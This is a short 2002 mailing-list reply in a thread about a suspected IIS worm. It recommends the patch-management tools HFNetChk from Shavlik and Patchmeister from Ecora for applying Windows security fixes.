Re: new IIS worm? (rcp lsass.exe)

From: sunzi (sunzi@mod-x.co.uk)
Date: 09/25/02

From: "sunzi" <sunzi@mod-x.co.uk>
To: "zeno" <bugtraq@cgisecurity.net>, <incidents@securityfocus.com>
Date: Tue, 24 Sep 2002 20:51:24 -0400

HFNetchk written was by Shavlick and is available in Pro version here:
http://www.shavlik.com/
Also, I noticed that there having a 'Get HFNetChkLT with Free Patch Pushing'
event (http://www.shavlik.com/security/prod_gen_request.asp).

There's also Ecor'a Patchmeister (www.ecora.com), which is free, but doesn't
support patch pushing AFAIK.
cheers,